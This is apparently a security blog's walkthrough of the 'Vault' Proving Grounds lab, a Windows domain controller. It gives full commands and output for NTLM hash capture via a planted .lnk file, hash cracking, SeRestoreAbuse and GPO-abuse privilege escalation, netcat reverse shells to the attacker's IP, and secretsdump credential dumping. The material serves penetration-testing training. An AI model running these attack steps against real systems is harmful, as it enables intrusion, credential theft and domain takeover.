Xavier's Blog一个安全工作者
Xavier's Blog一个安全工作者

ProvingGrounds Vault Writeup

Xavier Xavier 收录于 靶场
 约 3700 字 预计阅读 8 分钟 - 次阅读  

Vault

这是第23台,Windows系统,难度Hard,名称 Vault

192.168.202.172

PortScan 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

┌──(xavier㉿kali)-[~/Desktop/OSCP]
└─$ sudo nmap -n -r --min-rate=3500 -sSV 192.168.202.172 -T4   
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-09 16:45 CST
Nmap scan report for 192.168.202.172
Host is up (0.19s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-02-09 08:45:09Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: vault.offsec0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: vault.offsec0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.25 seconds

全端口扫描:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

┌──(xavier㉿kali)-[~/Desktop/OSCP]
└─$ sudo nmap -n -r --min-rate=3500 -sSV 192.168.202.172 -T4 -p-           
[sudo] xavier 的密码:
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-09 16:45 CST
Nmap scan report for 192.168.202.172
Host is up (0.19s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-02-09 08:46:28Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: vault.offsec0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: vault.offsec0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
49689/tcp open  msrpc         Microsoft Windows RPC
49704/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 115.86 seconds

域主机,域名:vault.offsec

InitAccess

SMB

SMB匿名访问

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice]
└─$ smbclient -L //192.168.202.172/ -U ''                       
Password for [WORKGROUP\]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        DocumentsShare  Disk      
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.202.172 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13

┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice/Vault]
└─$ crackmapexec smb 192.168.202.172 -u 'guest' -p '' --shares 
SMB         192.168.202.172 445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:vault.offsec) (signing:True) (SMBv1:False)
SMB         192.168.202.172 445    DC               [+] vault.offsec\guest: 
SMB         192.168.202.172 445    DC               [+] Enumerated shares
SMB         192.168.202.172 445    DC               Share           Permissions     Remark
SMB         192.168.202.172 445    DC               -----           -----------     ------
SMB         192.168.202.172 445    DC               ADMIN$                          Remote Admin
SMB         192.168.202.172 445    DC               C$                              Default share
SMB         192.168.202.172 445    DC               DocumentsShare  READ,WRITE      
SMB         192.168.202.172 445    DC               IPC$            READ            Remote IPC
SMB         192.168.202.172 445    DC               NETLOGON                        Logon server share 
SMB         192.168.202.172 445    DC               SYSVOL                          Logon server share

可以看到 DocumentsShare 路径下有可写权限。尝试上传恶意文件到该目录下。

使用NTLM_Theft工具生成恶意文件.

1
2
3
4

┌──(xavier㉿kali)-[~/Hacksafe/4-权限提升/Windows/ntlm_theft]
└─$ python3 ntlm_theft.py -g lnk -s 192.168.45.248 -f test
Created: test/test.lnk (BROWSE TO FOLDER)
Generation Complete.

上传到该目录下,responder等待回连

1
2
3
4
5
6

──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice/Vault]
└─$ smbclient //192.168.202.172/DocumentsShare -U ''
Password for [WORKGROUP\]:
Try "help" to get a list of possible commands.
smb: \> put test.lnk 
putting file test.lnk as \test.lnk (3.3 kb/s) (average 3.3 kb/s)
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice/Vault]
└─$ sudo responder -I tun0
……

[+] Listening for events...                                                                                 

[SMB] NTLMv2-SSP Client   : 192.168.202.172
[SMB] NTLMv2-SSP Username : VAULT\anirudh
[SMB] NTLMv2-SSP Hash     : anirudh::VAULT:b016c3bc0a2a9b1c:8B6874393AEA8CC736BEAA79E7E1D231:010100000000000000DD12A6A05BDA01B5B2F11259155F4A000000000200080051004B003700350001001E00570049004E002D00570041005A00460036004B0035004A0057004B00560004003400570049004E002D00570041005A00460036004B0035004A0057004B0056002E0051004B00370035002E004C004F00430041004C000300140051004B00370035002E004C004F00430041004C000500140051004B00370035002E004C004F00430041004C000700080000DD12A6A05BDA010600040002000000080030003000000000000000010000000020000077EEB54469D1F6103BA0F72DC177ACE44970D6FADE091CA17405179482A7C5F20A001000000000000000000000000000000000000900260063006900660073002F003100390032002E003100360038002E00340035002E003200340038000000000000000000                       
[*] Skipping previously captured hash for VAULT\anirudh
[*] Skipping previously captured hash for VAULT\anirudh

hashcat尝试破解

1
2
3

┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice/Vault]
└─$ hashcat -m 5600 -a 0 1.hash /usr/share/wordlists/rockyou.txt --force --quiet
ANIRUDH::VAULT:b016c3bc0a2a9b1c:8b6874393aea8cc736beaa79e7e1d231:010100000000000000dd12a6a05bda01b5b2f11259155f4a000000000200080051004b003700350001001e00570049004e002d00570041005a00460036004b0035004a0057004b00560004003400570049004e002d00570041005a00460036004b0035004a0057004b0056002e0051004b00370035002e004c004f00430041004c000300140051004b00370035002e004c004f00430041004c000500140051004b00370035002e004c004f00430041004c000700080000dd12a6a05bda010600040002000000080030003000000000000000010000000020000077eeb54469d1f6103ba0f72dc177ace44970d6fade091ca17405179482a7c5f20a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00340035002e003200340038000000000000000000:SecureHM

得到一组账号密码:anirudh/SecureHM

使用Evil-WinRM成功登录系统

1
2
3
4
5
6

┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice/Vault]
└─$ evil-winrm -u anirudh -p SecureHM -i 192.168.202.172
……
*Evil-WinRM* PS C:\Users\anirudh\Documents>
*Evil-WinRM* PS C:\Users\anirudh\Documents> type C:\Users\anirudh\Desktop\local.txt
6379a394e97f465833bd2a2d72fe5d56

PrivE

检查当前用户权限,发现权限有很多:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

*Evil-WinRM* PS C:\Users\anirudh\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State
============================= =================================== =======
SeMachineAccountPrivilege     Add workstations to domain          Enabled
SeSystemtimePrivilege         Change the system time              Enabled
SeBackupPrivilege             Back up files and directories       Enabled
SeRestorePrivilege            Restore files and directories       Enabled
SeShutdownPrivilege           Shut down the system                Enabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled
SeRemoteShutdownPrivilege     Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set      Enabled
SeTimeZonePrivilege           Change the time zone                Enabled

SeRestorePrivilege

看到有这个权限,可以用于提权。

使用工具:SeRestoreAbuse,需要自己手动编译一下。

上传SeRestoreAbuse 和nc

1
2
3
4

*Evil-WinRM* PS C:\Users\anirudh\Documents> upload SeRestoreAbuse.exe
*Evil-WinRM* PS C:\Users\anirudh\Documents> upload nc64.exe
*Evil-WinRM* PS C:\Users\anirudh\Documents> mkdir C:\tmp\
*Evil-WinRM* PS C:\Users\anirudh\Documents> copy nc64.exe C:\tmp\nc.exe

执行 SeRestoreAbuse 利用脚本

1
2
3

*Evil-WinRM* PS C:\Users\anirudh\Documents> ./SeRestoreAbuse.exe "C:\tmp\nc.exe 192.168.45.248 4444 -e powershell"
RegCreateKeyExA result: 0
RegSetValueExA result: 0

另一边nc监听,因为SeRestoreAbuse这个工具执行一段时间后,可能会报错导致shell中断,再做一次转发就好了

1
2
3
4
5
6
7
8
9

┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice/Vault]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.45.248] from (UNKNOWN) [192.168.202.172] 51849
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> C:\tmp\nc.exe 192.168.45.248 5555 -e powershell
C:\tmp\nc.exe 192.168.45.248 5555 -e powershell
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13

┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice/Vault]
└─$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.45.248] from (UNKNOWN) [192.168.202.172] 51852
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32> type C:\users\administrator\desktop\proof.txt
type C:\users\administrator\desktop\proof.txt
12ef329cf77b22fb67e52b389022be6d
1
2
3

./SeRestoreAbuse.exe "C:\tmp\nc.exe 192.168.45.248 4444 -e powershell"

C:\tmp\nc.exe 192.168.45.248 5555 -e powershell

GPO Abuse

检查当前用户是否具备修改组策略的权限。

将PowerView 放到Evil-WinRM的执行目录下

1
2
3
4
5
6

┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice/Vault]
└─$ cp /usr/share/windows-resources/powersploit/Recon/PowerView.ps1 .

┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice/Vault]
└─$ ls
1.hash  PowerView.ps1

接下来, 使用Evil-WinRM 和 -s 参数重新连接,以便访问当前目录中的 PowerShell 脚本。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

*Evil-WinRM* PS C:\Users\anirudh\Documents> exit

Info: Exiting with code 0


┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice/Vault]
└─$ evil-winrm -u anirudh -p SecureHM -i 192.168.202.172 -s .

……

*Evil-WinRM* PS C:\Users\anirudh\Documents> 
*Evil-WinRM* PS C:\Users\anirudh\Documents> PowerView.ps1

组策略枚举

使用 Get-NetGPO 列出 GPOs(Group Policy Objects),获取GUID

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48

*Evil-WinRM* PS C:\Users\anirudh\Documents> PowerView.ps1
*Evil-WinRM* PS C:\Users\anirudh\Documents> Get-NetGPO


usncreated               : 5672
systemflags              : -1946157056
displayname              : Default Domain Policy
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}][{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}][{B1BE8D72-6EAC-11D2-A4EA-00C04F79F83A}{53D6AB1B-2488-11D1-A28C-00
                           C04FB94F17}]
whenchanged              : 11/19/2021 9:00:32 AM
objectclass              : {top, container, groupPolicyContainer}
gpcfunctionalityversion  : 2
showinadvancedviewonly   : True
usnchanged               : 12778
dscorepropagationdata    : {11/19/2021 9:00:32 AM, 11/19/2021 8:51:14 AM, 1/1/1601 12:00:00 AM}
name                     : {31B2F340-016D-11D2-945F-00C04FB984F9}
flags                    : 0
cn                       : {31B2F340-016D-11D2-945F-00C04FB984F9}
iscriticalsystemobject   : True
gpcfilesyspath           : \\vault.offsec\sysvol\vault.offsec\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
distinguishedname        : CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=vault,DC=offsec
whencreated              : 11/19/2021 8:50:33 AM
versionnumber            : 4
instancetype             : 4
objectguid               : 93130581-3375-49c7-88d3-afdc915a9526
objectcategory           : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=vault,DC=offsec

usncreated               : 5675
systemflags              : -1946157056
displayname              : Default Domain Controllers Policy
gpcmachineextensionnames : [{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}]
whenchanged              : 11/19/2021 8:50:33 AM
objectclass              : {top, container, groupPolicyContainer}
gpcfunctionalityversion  : 2
showinadvancedviewonly   : True
usnchanged               : 5675
dscorepropagationdata    : {11/19/2021 8:51:14 AM, 1/1/1601 12:00:00 AM}
name                     : {6AC1786C-016F-11D2-945F-00C04fB984F9}
flags                    : 0
cn                       : {6AC1786C-016F-11D2-945F-00C04fB984F9}
iscriticalsystemobject   : True
gpcfilesyspath           : \\vault.offsec\sysvol\vault.offsec\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}
distinguishedname        : CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=vault,DC=offsec
whencreated              : 11/19/2021 8:50:33 AM
versionnumber            : 1
instancetype             : 4
objectguid               : 0ccc30ba-3bef-43ac-9c61-ebb814e9a685
objectcategory           : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=vault,DC=offsec

使用 Get-GPPermission 检查默认组策略(Default Group Policy)的权限。

1
2
3
4
5
6
7

*Evil-WinRM* PS C:\Users\anirudh\Documents> Get-GPPermission -Guid 31B2F340-016D-11D2-945F-00C04FB984F9 -TargetType User -TargetName anirudh


Trustee     : anirudh
TrusteeType : User
Permission  : GpoEditDeleteModifySecurity
Inherited   : False

“Permission”表明 anirudh 用户编辑、删除和修改此策略的权限。可以使用 SharpGPOAbuse 工具来利用这种错误配置。

下载SharpGPOAbuse: https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.0_x64/SharpGPOAbuse.exe

1
2

┌──(xavier㉿kali)-[~/Desktop/OSCP/tools/win]
└─$ wget https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.0_x64/SharpGPOAbuse.exe

上传到目标主机

1
2
3
4
5
6
7

*Evil-WinRM* PS C:\Users\anirudh\Documents> upload SharpGPOAbuse.exe
Info: Uploading SharpGPOAbuse.exe to C:\Users\anirudh\Documents\SharpGPOAbuse.exe

                                                             
Data: 94208 bytes of 94208 bytes copied

Info: Upload successful!

执行 SharpGPOAbuse.exe,将anirudh用户帐户添加到本地管理员组,传递用户名,并传递我们具有写入权限的组策略。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

*Evil-WinRM* PS C:\Users\anirudh\Documents> ./SharpGPOAbuse.exe --AddLocalAdmin --UserAccount anirudh --GPOName "Default Domain Policy"
[+] Domain = vault.offsec
[+] Domain Controller = DC.vault.offsec
[+] Distinguished Name = CN=Policies,CN=System,DC=vault,DC=offsec
[+] SID Value of anirudh = S-1-5-21-537427935-490066102-1511301751-1103
[+] GUID of "Default Domain Policy" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] File exists: \\vault.offsec\SysVol\vault.offsec\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] The GPO does not specify any group memberships.
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!

更新本地组策略

1
2
3
4
5
6

*Evil-WinRM* PS C:\Users\anirudh\Documents> gpupdate /force
Updating policy...

Computer Policy update has completed successfully.

User Policy update has completed successfully.

验证当前用户是否成功添加到本地管理员组

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

*Evil-WinRM* PS C:\Users\anirudh\Documents> net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
anirudh
The command completed successfully.

接下去就可以用RDP登录到目标主机上

1
2

┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice/Vault]
└─$ xfreerdp /u:anirudh /p:'SecureHM' /v:192.168.202.172 /sec:nla /dynamic-resolution +clipboard /drive:share,/home/xavier/project/ /tls-seclevel:0

image-20240209230516809

也可以使用 psexec 获取交互式shell。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19

┌──(xavierkali)-[~/Desktop/OSCP/PG_Practice/Vault]
└─$ impacket-psexec vault.offsec/anirudh:SecureHM@192.168.202.172 
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Requesting shares on 192.168.202.172.....
[*] Found writable share ADMIN$
[*] Uploading file tAligQWE.exe
[*] Opening SVCManager on 192.168.202.172.....
[*] Creating service ycfe on 192.168.202.172.....
[*] Starting service ycfe.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2300]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> type C:\users\administrator\desktop\proof.txt
12ef329cf77b22fb67e52b389022be6d

也可以使用anirudh,获取administrator等用户的hash

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice/Vault]
└─$ impacket-secretsdump vault.offsec/anirudh:SecureHM@192.168.202.172
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xe9a15188a6ad2d20d26fe2bc984b369e
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:608339ddc8f434ac21945e026887dc36:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
……
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:54ff9c380cf1a80c23467ff51919146e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c660d4355b25d08a42130cb43d93418c:::
anirudh:1103:aad3b435b51404eeaad3b435b51404ee:74c8075e8506407ebe49bb8de63f6057:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:04a4f11933ff6e77b6b03a8591cfb48e:::
[*] Kerberos keys grabbed
……

image-20240209233026955

然后使用Administrator登录,这时候已经是域管理员账户权限了。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41

┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice/Vault]
└─$ evil-winrm -i 192.168.202.172 -u administrator -H 54ff9c380cf1a80c23467ff51919146e

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                                                                                 

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                                                                   

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
vault\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> net user administrator
User name                    Administrator
Full Name
Comment                      Built-in account for administering the computer/domain
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            11/19/2021 5:43:21 AM
Password expires             Never
Password changeable          11/20/2021 5:43:21 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   2/9/2024 12:43:43 AM

Logon hours allowed          All

Local Group Memberships      *Administrators
Global Group memberships     *Domain Admins        *Group Policy Creator
                             *Domain Users         *Schema Admins
                             *Enterprise Admins
The command completed successfully.

image-20240209233103826

flag 

1
2
3
4
5
6
7

anirudh/SecureHM

type C:\Users\anirudh\Desktop\local.txt
6379a394e97f465833bd2a2d72fe5d56

type C:\users\administrator\desktop\proof.txt
12ef329cf77b22fb67e52b389022be6d
更新于 2024-02-09 
OSCPPG_Practice
返回 | 主页
0%